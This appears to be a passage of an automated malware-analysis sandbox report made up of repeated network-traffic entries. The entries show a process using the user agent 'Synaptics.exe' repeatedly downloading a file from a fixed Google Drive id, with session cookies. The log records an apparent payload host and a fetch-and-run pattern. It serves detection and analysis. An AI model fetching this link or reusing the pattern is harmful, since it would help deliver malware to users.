                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
